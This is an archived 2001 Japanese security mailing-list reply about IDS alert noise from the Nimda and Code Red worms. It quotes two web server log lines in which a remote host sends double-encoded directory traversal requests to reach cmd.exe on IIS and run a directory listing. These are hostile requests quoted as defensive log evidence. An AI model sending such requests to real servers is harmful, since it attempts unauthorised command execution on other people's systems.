[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

[stalk:00914] Re: Nimda とか、 CodeGree nとか

To: security-talk@xxxxxxxxxxxxxxxxxxxx
Subject: [stalk:00914] Re: Nimda とか、 CodeGree nとか
From: Minoru Hagiyama <hagiyama@xxxxxxxxxxx>
Date: Tue, 02 Oct 2001 10:14:23 +0900



はぎやまです。

> NimdaとCodeXXXXはアラートがウザくてＤＢ圧迫しまくり、貴重な資源を
> 浪費するだけですので、最近はシグネチャ外しております。

アラートの数が半端でないので、SnortSnarf入れてました:-)。
しかし、どさくさ紛れにこんなの打ってくるやつもいて、Web-iis
ルールをコメントアウトしたくなります。

Name: proxyere.ginet.com.br
200.248.138.135 - - [01/Oct/2001:21:33:14 +0900] "GET /msadc/%2e%2e%25%35%63%2e%
2e%25%35%63%2e%2e%25%35%63%2e%2e%25%35%63%2e%2e%25%35%63%2e%2e%25%35%63%2e%2e%25
%35%63%2e%2e%25%35%63%2e%2e%25%35%63%2e%2e%25%35%63%2e%2e%25%35%63winnt/system32
/cmd.exe?/c%20dir%20c:\ HTTP/1.0" 404 277
200.248.138.135 - - [01/Oct/2001:21:33:14 +0900] "GET /scripts/%2e%2e%25%35%63%2
e%2e%25%35%63%2e%2e%25%35%63%2e%2e%25%35%63%2e%2e%25%35%63%2e%2e%25%35%63%2e%2e%
25%35%63%2e%2e%25%35%63%2e%2e%25%35%63%2e%2e%25%35%63%2e%2e%25%35%63winnt/system
32/cmd.exe?/c%20dir%20c:\ HTTP/1.0" 404 279

長いので以下省略。


--
- このメイリングリストに関する質問・問い合せ等は
- <security-talk@xxxxxxxxxx>までお知らせください
--
------------------------------------------------------------------------
　　　　　　　　　　　　　これは『欲』しいっ!!
　　　　　　 　 http://house2.infoseek.co.jp/?svx=971122

Follow-Ups:
- [stalk:00915] Re: Nimda とか、 CodeGree nとか
  - From: MICKY

Prev by Date: [stalk:00913] Re: Nimda とか、 CodeGreen とか
Next by Date: [stalk:00915] Re: Nimda とか、 CodeGree nとか
Previous by thread: [stalk:00913] Re: Nimda とか、 CodeGreen とか
Next by thread: [stalk:00915] Re: Nimda とか、 CodeGree nとか
Index(es):
- Date
- Thread